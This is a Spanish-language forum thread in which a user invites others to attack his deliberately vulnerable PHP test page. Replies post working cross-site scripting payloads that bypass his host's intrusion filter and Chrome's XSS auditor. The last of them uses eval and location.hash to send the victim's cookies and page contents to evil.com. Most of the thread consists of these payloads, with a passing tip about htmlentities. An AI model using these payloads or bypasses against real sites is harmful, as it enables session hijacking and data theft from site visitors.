Título: XSS host protect Publicado por: patilanz en 12 Octubre 2014, 10:53 am Hola es posible que tu hosting te proteja de ataques XSS porque estoy utilizando hostinger.es y me hice una pagina de prueba en plan:
Código Pero al poner pagina?hola = <script>alert()</script> Me muestra que la pagina no existe error 404. También probé métodos de https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet pero no consigo con ninguno. El background:url(javscript... todavía funciona? Saludos Título: Re: XSS host protect Publicado por: #!drvy en 12 Octubre 2014, 11:40 am Es posible pero antes asegurate de otras cosas.
Citar Pero al poner pagina?hola = <script>alert()</script> ¿ Pones pagina?hola= o pagina.php?hola= ? Si es el primer caso, tienes alguna regla tipo mod_rewrite que haga de router ? También ten en cuenta que algunos navegadores (safari,chrome,ie...) tienen filtros anti-xss por defecto. Tienes que mandar un header() para que los desactiven. Código Saludos Título: Re: XSS host protect Publicado por: patilanz en 12 Octubre 2014, 14:59 pm He desactivado el filtro de chrome antes usaba firefox con tor o ie con el filtro desactivado.
Mi pagina es pagina.php?name=... He cambiado el archivo un poco: Código
Luego con esto http://pruebasdephp.hol.es/XSS_test.php?name=javascript:location.href=%27http://www.google.es%27 Consigo redireccionar hacia google. Luego intente con 'http://www.google.es?a='+document.cookie" pero no me muestra el + La alerta tampoco consigo poner la Título: Re: XSS host protect Publicado por: daryo en 12 Octubre 2014, 16:15 pm usa htmlentities
http://www.w3schools.com/php/func_string_htmlentities.asp Código Título: Re: XSS host protect Publicado por: patilanz en 12 Octubre 2014, 19:27 pm Lo que quiero no es defender me si no lo contrario. Voy a poner la pagina si alguien consigue hacer una alerta o cookies o cualquier otra cosa con XSS y luego si me puede ensenar como lo ha hecho ;D
http://pruebasdephp.hol.es/XSS_test.php Saludos Título: Re: XSS host protect Publicado por: daryo en 12 Octubre 2014, 20:02 pm a en firefox y opera me funciona:
Citar http://pruebasdephp.hol.es/XSS_test.php?name=%3C/a%3E%3Cimg%20src=/%20onerror=%22location.href=%27http://www.google.es%27%22%3E%3C/img%3E lo que vendria a significar: Código: http://pruebasdephp.hol.es/XSS_test.php?name=</a><img src=/ onerror="location.href='http://www.google.es'"></img> no recuerdo muy bien pero los xss de chrome son diferentes Título: Re: XSS host protect Publicado por: WHK en 15 Octubre 2014, 23:34 pm Buscas algo así?
http://pruebasdephp.hol.es/XSS_test.php?name=x"><img onerror="a=alert;a('XSS by WHK')" src="x (http://pruebasdephp.hol.es/XSS_test.php?name=x"><img onerror="a=alert;a('XSS by WHK')" src="x) El ids (sistema de detección de intrusos) de hol.es es bastante malo, usan listas negras bastantes pobres, puedes bbypasear los filtros de muchas maneras. Bypasear el filtro de google chrome es un poco mas difícil pero también tiene sus formas de hacerlo. Edito: Aqui tienes un XSS que bypasea el filtro de hol.es y el de Google Chrome 38.0 y funciona en todos los navegadores a la fecha con o sin filtro: http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror="a=alert;a(0911) (http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror="a=alert;a(0911)) Realmente crees que los filtros son suficientes para detener un ataque?, yo creo que no. Acá hay otro XSS compatible con hol.es y google chrome: http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=alert;a(location.hash.substr(1))#XSS by WHK (http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=alert;a(location.hash.substr(1))#XSS by WHK) Acá un XSS mas peligroso compatible con todos los navegadores con filtros anti xss y hosteado en hol.es: http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=eval;a(location.hash.substr(1))#document.location="http://evil.com/?recibe=" + escape(document.cookie) + ': ' + escape(document.body.innerHTML); (http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=eval;a(location.hash.substr(1))#document.location="http://evil.com/?recibe=" + escape(document.cookie) + ': ' + escape(document.body.innerHTML);) Saludos. |